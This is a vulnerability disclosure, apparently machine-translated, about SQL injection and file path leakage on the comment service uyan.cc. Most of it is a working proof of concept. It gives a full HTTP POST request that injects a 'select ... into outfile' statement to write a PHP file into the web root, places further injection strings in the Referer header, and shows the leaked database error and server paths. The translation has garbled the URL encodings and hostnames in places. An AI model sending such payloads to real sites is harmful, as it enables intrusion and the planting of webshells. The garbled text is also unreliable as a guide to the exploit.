You can fix injection and file path leakage issues

 

Brief description:

Http://uyan.cc is the newly established community comment entrepreneurial company, its SQL filter lax caused by vulnerabilities.

Detailed description:

The http://uyan.cc/index.php/youyan_content/getRepliesTogether/time does not filter the post data. Simultaneously http://uyan.cc/index.php/youyan? Title = % E5 % 9B % BD % E5 % 86% E4 % BA % E5 % 852% 9B % E4 % B8 % leaked the file path.

However, because the database is separated from the web, it is difficult for into outfile to directly use webshell.

Proof of vulnerability:

POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1

 

Host: uyan. cc

 

Connection: keep-alive

 

Content-Length: 723

 

Origin: http://uyan.cc www.2cto.com.

 

X-Requested-With: XMLHttpRequest

 

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1

 

Content-Type: application/x-www-form-urlencoded

 

Accept: application/json, text/javascript ,*/*

 

Referer: http://uyan.cc/index.php/youyan? PageId = www.36kr.com _ www.36kr.com % 2F % 3Fp % 3D54654 & domain = www.36kr. coma '% 20 & % 20 '1' = '2 & master_id = 2711% 20 & % 201 = 2 & title = '''-1 & url =- 1 & pageImg =; % 3C/javascript % 3E & pageContent =-1

 

Accept-Encoding: gzip, deflate, sdch

 

Accept-Language: en-US, en; q = 0.8, zh-CN; q = 0.6

 

Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3

 

Cookie: PHPSESSID = 97ipt9bjm2otbd7j2cphg84444

 

 

 

Comment_ids % 5B % 5D = 168019 & comment_ids % 5B % 5D = 168031 and (select '000000' into outfile' // opt // lampstack-5.3.6-0 // apache2 // htdocs // controllers/ /1ssbbb. php ') = 1 & comment_ids % 5B % 5D = 168020 & comment_ids % 5B % 5D = 168032 & comment_ids % 5B % 5D = 168007 & comment_ids % 5B % 5D = 168006 & comment_ids % 5B % 5D = 167967 & comment_ids % 5B % 5D = 167985 & comment_ids % 5B % 5D = 167986 & comment_ids % 5B % 5D = 167987 & page = www.36kr.com _ www.36kr.com % 2F % 3Fp % 3D54654 & delStyle = 0 & found % 5B167967% 5D = 0 & reply_page_no % 5B167985% 5D = 0 & found % 5B167986% 5D = 0 & found % 5B167987% 5D = 0 & reply_page_no % 5B168006% = 0 & found % 5B168007% 5D = 0 & reply_page_no % 5B168019% 5D = 0 & found % 5B168020% 5D = 0 & found % 5B168031% 5D = 0 & reply_page_no % 5B168032% = 0 & session_name = uyan_www.36kr.com

 

 

<Body>

 

<Div id = "content">

 

<H1> A Database Error Occurred

 

<P> Error Number: 1064 </p> <p> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1 = 1 order by comment. time desc limit 0, 3 'at line 3 </p> <p> select user. *, comment. * from comment

 

Left join user ON user. user_id = comment. user_id

 

Where comment. del = 0 and comment. reply_to_comment_id = 168031 and '1 = 1 order by comment. time desc limit 0, 3 </p> <p> Filename:/opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php </p> <p> Line Number: 251 </p> </div>

 

</Body>

 

</Html>

Solution:

Filter user submitted parameters and Block Error details

Author: cr0_3